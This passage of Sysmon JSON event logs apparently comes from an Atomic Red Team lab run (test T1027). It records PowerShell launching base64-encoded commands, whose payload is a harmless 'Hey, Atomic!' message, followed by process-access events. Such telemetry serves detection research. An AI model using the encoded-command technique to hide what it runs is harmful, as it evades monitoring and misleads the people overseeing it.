05:52:44.515","ProcessGuid":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","ParentProcessId":"3064","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743cba8|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743ca1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474bf248|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47435604|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee5a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4746a8d6","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743cba8|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743ca1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+474bf248|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47435604|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee5a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4746a8d6","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5227,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5228,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5229,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.515\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.515","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
